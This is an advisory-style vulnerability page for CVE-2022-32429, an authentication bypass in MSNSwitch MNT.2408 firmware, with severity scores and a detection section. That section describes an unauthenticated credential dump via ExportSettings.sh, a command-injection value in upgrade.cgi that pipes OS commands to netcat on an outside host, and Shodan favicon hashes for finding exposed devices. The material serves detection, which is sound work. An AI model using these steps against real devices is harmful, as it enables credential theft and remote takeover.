cbcvebase.
CVE-2022-32429
published 2022-08-10

CVE-2022-32429: An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows…

PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
75.72%
99.5th percentile
An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.

Affected

1 ranges
VendorProductVersion rangeFixed in
megatechmsnswitch_firmware

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin-sdb/ExportSettings.sh
path/goform/login
path/saveUpgrade.asp
path/cgi-bin/upgrade.cgi
otherhttp.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
yara
matchers: word body 'SSID1'; regex header 'filename="Settings(.*).dat' and 'application/octet-stream'; status 200
  • Unauthenticated GET request to /cgi-bin-hax/ExportSettings.sh or /cgi-bin-sdb/ExportSettings.sh — a 200 response containing 'SSID1' and a Content-Disposition header matching 'filename="Settings*.dat' with content-type 'application/octet-stream' confirms the auth-bypass credential dump.
  • RCE is triggered via a GET to /cgi-bin/upgrade.cgi with a crafted firmware_url parameter containing backtick-escaped OS commands piped to netcat (e.g., firmware_url=http://...`CMD|nc HOST PORT`/filename?).
  • Credential extraction: parse the unauthenticated ExportSettings.sh response for lines matching 'Account1=' and 'Password1=' to recover plaintext admin credentials.
  • CSRF token is extracted from /saveUpgrade.asp after authenticated login; look for the pattern '?csrftoken=' in the page body — its presence indicates the device is an MSNSwitch target.
  • Use Shodan favicon hashes to identify exposed MSNSwitch devices on the internet: http.favicon.hash:-2073748627 or http.favicon.hash:-1721140132.
  • ·The unauthenticated configuration dump (ExportSettings.sh) only requires HTTP access from any network, but the full RCE via upgrade.cgi requires the attacker to be on the same subnet as the device.
  • ·Two distinct vulnerable paths exist: /cgi-bin-sdb/ExportSettings.sh (referenced in the NVD advisory) and /cgi-bin-hax/ExportSettings.sh (used in the working exploit PoC); both should be blocked.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.